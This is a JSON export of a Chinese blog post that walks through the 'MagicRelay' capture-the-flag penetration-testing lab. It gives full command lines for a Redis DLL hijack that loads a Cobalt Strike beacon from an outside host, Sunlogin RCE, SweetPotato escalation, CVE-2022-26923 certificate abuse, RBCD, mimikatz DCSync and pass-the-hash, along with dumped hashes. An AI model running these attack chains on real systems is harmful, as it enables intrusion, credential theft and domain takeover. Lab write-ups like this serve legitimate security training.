{"id":808,"date":"2025-03-04T00:24:57","date_gmt":"2025-03-03T16:24:57","guid":{"rendered":"http:\/\/www.s1mh0.cn\/blog\/?p=808"},"modified":"2025-03-19T23:34:32","modified_gmt":"2025-03-19T15:34:32","slug":"cqyj_magicrelay","status":"publish","type":"post","link":"https:\/\/www.s1mh0.cn\/blog\/index.php\/2025\/03\/04\/cqyj_magicrelay\/","title":{"rendered":"\u6625\u79cb\u4e91\u5883-MagicRelay"},"content":{"rendered":"<h2>MagicRelay<\/h2>\n<p>\u6d89\u53ca\u7684\u77e5\u8bc6\u70b9<\/p>\n<pre><code class=\"language-text\">redis dll\u52ab\u6301\u4e0a\u7ebfcs\u9a6c\n\u5411\u65e5\u8475 RCE\nSeImpersonatePrivilege\u914d\u5408\u751c\u571f\u8c46\u63d0\u6743\nsystem\u6743\u9650\u914d\u5408cs\u9a6c\u5bfc\u51fa\u673a\u5668\u7528\u6237ntlm hash\nActive Directory\u57df\u6743\u9650\u63d0\u5347\u6f0f\u6d1e\uff08CVE-2022-26923\uff09\npassthecert\u6253RBCD\u653b\u51fb\n\u54c8\u5e0c\u4f20\u9012<\/code><\/pre>\n<h3>flag1<\/h3>\n<p>fscan\u53ea\u626b\u5230\u4e00\u4e2aredis\u672a\u6388\u6743\uff0cAnother Redis Desktop Manager\u8fde\u4e0a\u53bb\u53d1\u73b0\u662fredis 3\u7684\u7248\u672c\uff0cWindows\u7cfb\u7edf<\/p>\n<pre><code class=\"language-text\">start infoscan\n39.98.125.24:6379 open\n[*] alive ports len is: 1\nstart vulscan\n[+] Redis 39.98.125.24:6379 unauthorized file:C:\\Program Files\\Redis\/dump.rdb\n\u5df2\u5b8c\u6210 1\/1\n[*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 10.1216089s<\/code><\/pre>\n<p>\u4e00\u5f00\u59cb\u4e5f\u662f\u60f3\u4e86\u51e0\u79cd\u601d\u8def\uff0c\u90fd\u6ca1\u5229\u7528\u8d77\u6765\uff1a<\/p>\n<ul>\n<li>\u4e3b\u4ece\u590d\u5236\u5f97redis4.0\u4ee5\u4e0a\u624d\u80fd\u6253<\/li>\n<li>\u673a\u5668\u6ca1\u6709web\u670d\u52a1\uff0c\u4e5f\u5199\u4e0d\u4e86webshell<\/li>\n<li>\u5199\u542f\u52a8\u9879\u5fc5\u987b\u8981\u91cd\u542f\u673a\u5668\u624d\u80fd\u751f\u6548<\/li>\n<li>\u5199MOF\u4e5f\u6ca1\u751f\u6548\uff0c\u5e94\u8be5\u4e0d\u662fwin2019\u7684\u673a\u5668<\/li>\n<li>dll\u52ab\u6301\uff0c\u8ddf\u7740\u4e00\u7bc7\u516c\u4f17\u53f7\u6587\u7ae0\u6ca1\u590d\u73b0\u51fa\u6765<\/li>\n<\/ul>\n<p>\u9042\u6446\uff0c\u76f4\u81f3\u770b\u5230<code>c1trus<\/code>\u5e08\u5085\u5199\u7684\u535a\u5ba2\uff0c\u53d1\u73b0\u786e\u5b9e\u8981\u5728vs\u6309\u7167\u5176\u6b65\u9aa4\u8bbe\u7f6e\u597d\u5c5e\u6027\uff0c\u6700\u540e\u624d\u80fdcs\u4e0a\u7ebf\u6210\u529f<\/p>\n<p>\u9996\u5148\u83b7\u53d6<code>dbghelp.dll<\/code>\uff0c\u56e0\u4e3a\u81ea\u5df1\u7535\u8111\u5c31\u662fwin10\uff0c\u76f4\u63a5\u628aSystem32\u6587\u4ef6\u5939\u4e0b\u7684\u62ff\u6765\u7528<\/p>\n<p>\u62ff\u5230\u540e\u5148\u7528<a href=\"https:\/\/github.com\/JKme\/sb_kiddie-\/blob\/master\/hacking_win\/dll_hijack\/DLLHijacker.py\">DLLHijacker<\/a>\u8f6c\u6210vs2019\u9879\u76ee\u6587\u4ef6<\/p>\n<pre><code class=\"language-text\">python3 DllHijacker.py dbghelp.dll <\/code><\/pre>\n<p>cs\u751f\u6210shellcode\uff0cvs\u6253\u5f00sln\u6587\u4ef6\uff0c\u66ff\u6362cs\u751f\u6210\u7684shellcode<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_1.png\" alt=\"magicrelay_1\" \/><\/p>\n<p>\u4fee\u6539\u4ee5\u4e0b\u5c5e\u6027<\/p>\n<ul>\n<li><code>C\/C++<\/code> -&gt; <code>\u4ee3\u7801\u751f\u6210<\/code> -&gt; <code>\u8fd0\u884c\u5e93<\/code>\u6539\u4e3a<code>\u591a\u7ebf\u7a0b\u8c03\u8bd5<\/code><\/li>\n<li><code>C\/C++<\/code> -&gt; <code>\u4ee3\u7801\u751f\u6210<\/code> -&gt; <code>\u5b89\u5168\u68c0\u67e5<\/code>\u6539\u4e3a<code>\u7981\u7528<\/code><\/li>\n<li><code>\u94fe\u63a5\u5668<\/code> -&gt; <code>\u751f\u6210\u6e05\u5355<\/code>\u6539\u4e3a<code>\u5426<\/code><\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_2.png\" alt=\"magicrelay_2\" \/><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_3.png\" alt=\"magicrelay_3\" \/><\/p>\n<p>\u5c06\u751f\u6210\u7684dll\u6587\u4ef6\u901a\u8fc7<a href=\"https:\/\/github.com\/r35tart\/RedisWriteFile\">RedisWriteFile<\/a>\u5199\u5165\u5230\u9776\u673a\uff0credis\u5b89\u88c5\u8def\u5f84\u53ef\u8fde\u63a5\u540e\u7528<code>info<\/code>\u547d\u4ee4\u67e5\u770b<\/p>\n<pre><code class=\"language-text\">python3 RedisWriteFile.py --rhost 39.98.117.52 --rport 6379 --lhost 8.138.89.236  --lport 16379 --rpath &#039;C:\\\\Program Files\\\\Redis\\\\&#039; --rfile &#039;dbghelp.dll&#039; --lfile &#039;dbghelp.dll&#039;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_4.png\" alt=\"magicrelay_4\" \/><\/p>\n<p>\u5199\u5165\u540e\u901a\u8fc7<code>bgsave<\/code>\u547d\u4ee4\u89e6\u53d1\u52ab\u6301\uff0c\u4e0a\u7ebfcs\u9a6c<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_5.png\" alt=\"magicrelay_5\" \/><\/p>\n<p>administrator\u6743\u9650\uff0cvshell\u4e0a\u7ebf\u76f4\u63a5\u80fd\u62ff\u7b2c\u4e00\u4e2aflag<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_6.png\" alt=\"magicrelay_6\" \/><\/p>\n<pre><code class=\"language-text\">flag{58455a83-7516-4a8f-92bf-ca94e7aa33a0}<\/code><\/pre>\n<h3>flag2<\/h3>\n<p>\u4f20gost\u548cfscan<\/p>\n<pre><code class=\"language-text\">start infoscan\n(icmp) Target 172.22.12.6     is alive\n(icmp) Target 172.22.12.12    is alive\n(icmp) Target 172.22.12.25    is alive\n(icmp) Target 172.22.12.31    is alive\n[*] Icmp alive hosts len is: 4\n172.22.12.6:88 open\n172.22.12.25:6379 open\n172.22.12.31:445 open\n172.22.12.25:445 open\n172.22.12.12:445 open\n172.22.12.6:445 open\n172.22.12.31:139 open\n172.22.12.25:139 open\n172.22.12.12:139 open\n172.22.12.6:139 open\n172.22.12.31:135 open\n172.22.12.25:135 open\n172.22.12.12:135 open\n172.22.12.6:135 open\n172.22.12.31:80 open\n172.22.12.12:80 open\n172.22.12.31:21 open\n[*] alive ports len is: 17\nstart vulscan\n[*] NetInfo\n[*]172.22.12.25\n   [-&gt;]WIN-YUYAOX9Q\n   [-&gt;]172.22.12.25\n[*] NetInfo\n[*]172.22.12.31\n   [-&gt;]WIN-IISQE3PC\n   [-&gt;]172.22.12.31\n[*] NetInfo\n[*]172.22.12.12\n   [-&gt;]WIN-AUTHORITY\n   [-&gt;]172.22.12.12\n[*] NetBios 172.22.12.6     [+] DC:WIN-SERVER.xiaorang.lab       Windows Server 2016 Standard 14393\n[*] NetInfo\n[*]172.22.12.6\n   [-&gt;]WIN-SERVER\n   [-&gt;]172.22.12.6\n[*] NetBios 172.22.12.31    WORKGROUP\\WIN-IISQE3PC\n[*] NetBios 172.22.12.12    WIN-AUTHORITY.xiaorang.lab          Windows Server 2016 Datacenter 14393\n[*] OsInfo 172.22.12.6  (Windows Server 2016 Standard 14393)\n[+] ftp 172.22.12.31:21:anonymous \n   [-&gt;]SunloginClient_11.0.0.33826_x64.exe\n[*] WebTitle http:\/\/172.22.12.31       code:200 len:703    title:IIS Windows Server\n[*] WebTitle http:\/\/172.22.12.12       code:200 len:703    title:IIS Windows Server\n[+] PocScan http:\/\/172.22.12.12 poc-yaml-active-directory-certsrv-detect \n[+] Redis 172.22.12.25:6379 unauthorized file:C:\\Program Files\\Redis\/dump.rdb\n\u5df2\u5b8c\u6210 17\/17\n[*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 14.3460105s<\/code><\/pre>\n<p>\u5f97\u5230\u4ee5\u4e0b\u4fe1\u606f\uff1a<\/p>\n<ul>\n<li><code>172.22.12.31<\/code> WIN-IISQE3PC\uff0c\u6709\u5411\u65e5\u8475<\/li>\n<li><code>172.22.12.6<\/code> WIN-SERVER\uff0cDC<\/li>\n<li><code>172.22.12.25<\/code> WIN-YUYAOX9Q\uff0c\u6709redis<\/li>\n<li><code>172.22.12.12<\/code> WIN-AUTHORITY\uff0c\u6709AD CS<\/li>\n<\/ul>\n<p>fscan\u626b\u5230\u4e86\u5411\u65e5\u8475\u662f11.0\u7248\u672c\uff0csunRce\u5148\u626b\u7aef\u53e3<\/p>\n<pre><code class=\"language-text\">sunRce.exe -t scan -h 172.22.12.31 -p 40000-50000<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_7.png\" alt=\"magicrelay_7\" \/><\/p>\n<p>\u63a5\u7740\u76f4\u63a5\u5229\u7528\u62ff\u5230system\u6743\u9650<\/p>\n<pre><code class=\"language-text\">sunRce.exe -h 172.22.12.31  -t rce -p 49688 -c &quot;whoami&quot;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_8.png\" alt=\"magicrelay_8\" \/><\/p>\n<p>\u53ef\u4ee5\u52a0\u7ba1\u7406\u5458\u8d26\u6237rdp\uff0c\u6216\u8005\u76f4\u63a5\u6253\u5370\u62ff\u7b2c\u4e8c\u4e2aflag<\/p>\n<pre><code class=\"language-text\">sunRce.exe -h 172.22.12.31  -t rce -p 49688 -c &quot;net user simho whoami@123 \/add&quot;\nsunRce.exe -h 172.22.12.31  -t rce -p 49688 -c &quot;net localgroup administrators simho \/add&quot;\n\nsunRce.exe -h 172.22.12.31  -t rce -p 49686 -c &quot;type C:\\Users\\Administrator\\flag\\flag02.txt&quot;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_9.png\" alt=\"magicrelay_9\" \/><\/p>\n<pre><code class=\"language-text\">flag{29a46b72-8a82-182a-45f3-532475ec6fd4}<\/code><\/pre>\n<h3>flag4<\/h3>\n<p>\u63a5\u7740\u56de\u53bb\u770bredis\u90a3\u53f0\u673a\u5668\uff0c\u6709<code>SeImpersonatePrivilege<\/code>\u7279\u6743\uff0c\u90a3\u53ef\u4ee5\u76f4\u63a5\u571f\u8c46\u63d0\u6743\u4e86<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_10.png\" alt=\"magicrelay_10\" \/><\/p>\n<p>\u7528\u751c\u571f\u8c46\u63d0\u6743\u6210system<\/p>\n<pre><code class=\"language-text\">C:\/Users\/Public\/sweetpotato.exe -a &quot;whoami&quot;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_11.png\" alt=\"magicrelay_11\" \/><\/p>\n<p>\u53d1\u73b0\u6709\u57df\u73af\u5883<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_12.png\" alt=\"magicrelay_12\" \/><\/p>\n<p>\u8fd9\u91cc\u76f4\u63a5\u751c\u571f\u8c46\u53bb\u6267\u884csharphound\u6536\u96c6\u547d\u4ee4\u6ca1\u6210\u529f\uff0c\u5148system\u8eab\u4efd\u4e0a\u7ebf\u4e4b\u540e\u518d\u53bb\u6536\u96c6<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_13.png\" alt=\"magicrelay_13\" \/><\/p>\n<p>\u62d3\u6251\u56fe\u53ea\u770b\u5230DC\u8fd9\u53f0\u673a\u5668\uff0c\u800c\u4e14\u4e5f\u6ca1\u5565\u4e1c\u897f<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_14.png\" alt=\"magicrelay_14\" \/><\/p>\n<p>cs\u4ee5system\u6743\u9650\u4e0a\u7ebf\uff0c\u80fd\u6293\u5230<code>WIN-YUYAOX9Q$<\/code>\u673a\u5668\u7528\u6237\u7684NTLM<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_15.png\" alt=\"magicrelay_15\" \/><\/p>\n<pre><code class=\"language-text\">* Username : WIN-YUYAOX9Q$\n* Domain   : XIAORANG\n* NTLM     : e611213c6a712f9b18a8d056005a4f0f\n* SHA1     : 1a8d2c95320592037c0fa583c1f62212d4ff8ce9<\/code><\/pre>\n<p>\u56e0\u4e3a\u626b\u5230\u4e86AD CS\uff0ccertify\u6536\u96c6\u4e00\u4e0b\u4fe1\u606f\uff08\u7528system\u6743\u9650\uff09<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_16.png\" alt=\"magicrelay_16\" \/><\/p>\n<pre><code class=\"language-text\">[*] Action: Find certificate templates\n[*] Using the search base &#039;CN=Configuration,DC=xiaorang,DC=lab&#039;\n\n[*] Listing info about the Enterprise CA &#039;xiaorang-WIN-AUTHORITY-CA&#039;\n\n    Enterprise CA Name            : xiaorang-WIN-AUTHORITY-CA\n    DNS Hostname                  : WIN-AUTHORITY.xiaorang.lab\n    FullName                      : WIN-AUTHORITY.xiaorang.lab\\xiaorang-WIN-AUTHORITY-CA\n    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED\n    Cert SubjectName              : CN=xiaorang-WIN-AUTHORITY-CA, DC=xiaorang, DC=lab\n    Cert Thumbprint               : 10944A7D8B6C6CBC7EE267DD6DBF3C0624FE7F08\n    Cert Serial                   : 2E92B9E129A646B84641219EFBDB1EB3\n    Cert Start Date               : 2022\/10\/29 10:50:19\n    Cert End Date                 : 2027\/10\/29 11:00:19\n    Cert Chain                    : CN=xiaorang-WIN-AUTHORITY-CA,DC=xiaorang,DC=lab\n    UserSpecifiedSAN              : Disabled\n    CA Permissions                :\n      Owner: BUILTIN\\Administrators        S-1-5-32-544\n\n      Access Rights                                     Principal\n\n      Allow  Enroll                                     NT AUTHORITY\\Authenticated UsersS-1-5-11\n      Allow  ManageCA, ManageCertificates               BUILTIN\\Administrators        S-1-5-32-544\n      Allow  ManageCA, ManageCertificates               XIAORANG\\Domain Admins        S-1-5-21-3745972894-1678056601-2622918667-512\n      Allow  ManageCA, ManageCertificates               XIAORANG\\Enterprise Admins    S-1-5-21-3745972894-1678056601-2622918667-519\n    Enrollment Agent Restrictions : None\n\n[+] No Vulnerable Certificates Templates found!<\/code><\/pre>\n<p>\u63a5\u4e0b\u6765\u5c31\u662f\u50cf2022\u7f51\u9f0e\u676f\u90a3\u6837\u6253CVE-2022-26923\u57df\u63d0\u6743\u6f0f\u6d1e\uff0c\u5148\u914d\u4e00\u4e0bhosts<\/p>\n<pre><code class=\"language-text\">172.22.12.6 WIN-SERVER.xiaorang.lab\n172.22.12.12 WIN-AUTHORITY.xiaorang.lab<\/code><\/pre>\n<p>\u73b0\u5728\u8fd8\u9700\u8981\u4e00\u4e2a\u77e5\u9053\u8d26\u5bc6\u7684\u673a\u5668\u7528\u6237\uff0c\u5229\u7528\u524d\u9762<code>WIN-YUYAOX9Q$<\/code>\u673a\u5668\u7528\u6237\u521b\u5efa\u4e00\u4e2a\u65b0\u7684\u673a\u5668\u7528\u6237<\/p>\n<pre><code class=\"language-text\">proxychains4 certipy account create -u WIN-YUYAOX9Q$ -hashes e611213c6a712f9b18a8d056005a4f0f  -dc-ip 172.22.12.6 -user simho -dns WIN-SERVER.xiaorang.lab -debug<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_17.png\" alt=\"magicrelay_17\" \/><\/p>\n<pre><code class=\"language-text\">simho$\/YNj8hDLLR82VNLZq<\/code><\/pre>\n<p>\u63a5\u7740\u5229\u7528\u8be5\u673a\u5668\u7528\u6237\u4ee5\u53ca\u524d\u9762certify\u6536\u96c6\u7684<code>CA name<\/code>\u83b7\u53d6pfx\u51ed\u8bc1<\/p>\n<p>\u5229\u7528\u8bc1\u4e66\u83b7\u53d6\u57df\u63a7hash\u65f6\uff0c\u8ddfCertify\u90a3\u4e2a\u9776\u573a\u62a5\u4e00\u6837\u7684\u9519<\/p>\n<pre><code class=\"language-text\">proxychains4 certipy req -u &#039;simho$@xiaorang.lab&#039; -p &#039;YNj8hDLLR82VNLZq&#039; -ca &#039;xiaorang-WIN-AUTHORITY-CA&#039; -target 172.22.12.12 -template &#039;Machine&#039; -debug -dc-ip 172.22.12.6\n\nproxychains4 certipy auth -pfx win-server.pfx -dc-ip 172.22.12.6 -debug<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_18.png\" alt=\"magicrelay_18\" \/><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_19.png\" alt=\"magicrelay_19\" \/><\/p>\n<p>\u6309\u7167<code>Schannel<\/code>\u6b65\u9aa4\u6765\uff0c\u4ece.pfx\u5206\u522b\u5bfc\u51fa.key\u6587\u4ef6\u548c.crt\u6587\u4ef6\uff0c\u5e76\u5c06\u5bc6\u7801\u7f6e\u7a7a<\/p>\n<pre><code class=\"language-text\">openssl pkcs12 -in win-server.pfx -nodes -out win-server.pem\nopenssl rsa -in win-server.pem -out win-server.key\nopenssl x509 -in win-server.pem -out win-server.crt\nproxychains4 certipy cert -pfx win-server.pfx -nokey -out win-server.crt\nproxychains4 certipy cert -pfx win-server.pfx -nocert -out win-server.key <\/code><\/pre>\n<p>\u63a5\u4e0b\u6765\u7528<code>passthecert<\/code>\u6253RBCD\u653b\u51fb<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_20.png\" alt=\"magicrelay_20\" \/><\/p>\n<p>\u5c06\u8bc1\u4e66\u4f20\u9012\u5230 LDAP\uff0c\u4fee\u6539 LDAP \u914d\u7f6e\u4ece\u800c\u83b7\u5f97\u57df\u63a7\u6743\u9650<\/p>\n<pre><code class=\"language-text\">proxychains4 python3 passthecert.py -action whoami -crt win-server.crt -key win-server.key -domain xiaorang.lab -dc-ip 172.22.12.6<\/code><\/pre>\n<p>\u5c06\u8bc1\u4e66\u914d\u7f6e\u5230\u57df\u63a7\u7684<code>RBCD<\/code><\/p>\n<pre><code class=\"language-text\">proxychains4 python3 passthecert.py -action write_rbcd -crt win-server.crt -key win-server.key -domain xiaorang.lab -dc-ip 172.22.12.6 -delegate-to &#039;win-server$&#039; -delegate-from &#039;simho$&#039;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_21.png\" alt=\"magicrelay_21\" \/><\/p>\n<p>\u7533\u8bf7CIFS\u670d\u52a1\u7968\u636e<\/p>\n<pre><code class=\"language-text\">proxychains4 impacket-getST xiaorang.lab\/&#039;simho$&#039;:&#039;YNj8hDLLR82VNLZq&#039; -spn cifs\/WIN-SERVER.xiaorang.lab -impersonate Administrator -dc-ip 172.22.12.6<\/code><\/pre>\n<p>\u5bfc\u5165\u7968\u636e<\/p>\n<pre><code class=\"language-text\">export KRB5CCNAME=Administrator.ccache<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_22.png\" alt=\"magicrelay_22\" \/><\/p>\n<p>\u5bfc\u5165\u540e\u5373\u53ef\u65e0\u5bc6\u7801\u767b\u5f55<\/p>\n<pre><code class=\"language-text\">proxychains4 impacket-psexec Administrator@WIN-SERVER.xiaorang.lab -k -no-pass -dc-ip 172.22.12.6<\/code><\/pre>\n<p>\u62ff\u5230\u57df\u63a7flag<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_23.png\" alt=\"magicrelay_23\" \/><\/p>\n<pre><code class=\"language-text\">flag{4c7d6e81-3161-4853-b93f-349ab74a60e5}<\/code><\/pre>\n<h3>flag3<\/h3>\n<p>\u5728\u57df\u63a7\u90a3\u53f0\u673a\u5668\u6dfb\u52a0\u7ba1\u7406\u5458\u8d26\u53f7\uff0crdp\u8fde\u63a5\u4e0a\u53bb\u540e\uff0c\u5c06mimikatz.exe\u653e\u5230System32\u6587\u4ef6\u5939\u4e0b\uff0c\u7136\u540e\u4ee5system\u6743\u9650\u5bfc\u54c8\u5e0c<\/p>\n<pre><code class=\"language-text\">mimikatz.exe &quot;lsadump::dcsync \/domain:xiaorang.lab \/all \/csv&quot; &quot;exit&quot;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_24.png\" alt=\"magicrelay_24\" \/><\/p>\n<p>\u6216\u8005\u5b66<code>c1trus<\/code>\u5e08\u5085\u7528SAM\u8f6c\u50a8<\/p>\n<pre><code class=\"language-text\">proxychains4 impacket-secretsdump &#039;xiaorang.lab\/administrator@win-server.xiaorang.lab&#039; -target-ip 172.22.12.6 -no-pass -k<\/code><\/pre>\n<pre><code class=\"language-text\">......\n[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)\n[*] Using the DRSUAPI method to get NTDS.DIT secrets\n[proxychains] Strict chain  ...  39.98.117.52:10086  ...  172.22.12.6:135  ...  OK\n[proxychains] Strict chain  ...  39.98.117.52:10086  ...  172.22.12.6:49667  ...  OK\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:aa95e708a5182931157a526acf769b13:::\n......<\/code><\/pre>\n<p>\u63a5\u7740PTH\u5230<code>172.22.12.12<\/code>\u673a\u5668\u62ff\u6700\u540e\u4e00\u4e2aflag<\/p>\n<pre><code class=\"language-text\">proxychains4 impacket-smbexec -hashes :aa95e708a5182931157a526acf769b13 xiaorang.lab\/administrator@172.22.12.12 -codec gbk\n\ntype C:\\Users\\Administrator\\flag03.txt<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/03\/magicrelay_25.png\" alt=\"magicrelay_25\" \/><\/p>\n<pre><code class=\"language-text\">flag{317621a6-bb66-4154-b157-365c871d52d2}<\/code><\/pre>\n<div class=\"clearfix\"><\/div>","protected":false},"excerpt":{"rendered":"<p>MagicRelay \u6d89\u53ca\u7684\u77e5\u8bc6\u70b9 redis dll\u52ab\u6301\u4e0a\u7ebfcs\u9a6c \u5411\u65e5\u8475 RCE SeImpersonat [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-808","post","type-post","status-publish","format-standard","hentry","category-pentesting"],"views":635,"_links":{"self":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/808","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=808"}],"version-history":[{"count":3,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/808\/revisions"}],"predecessor-version":[{"id":836,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/808\/revisions\/836"}],"wp:attachment":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=808"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=808"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=808"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}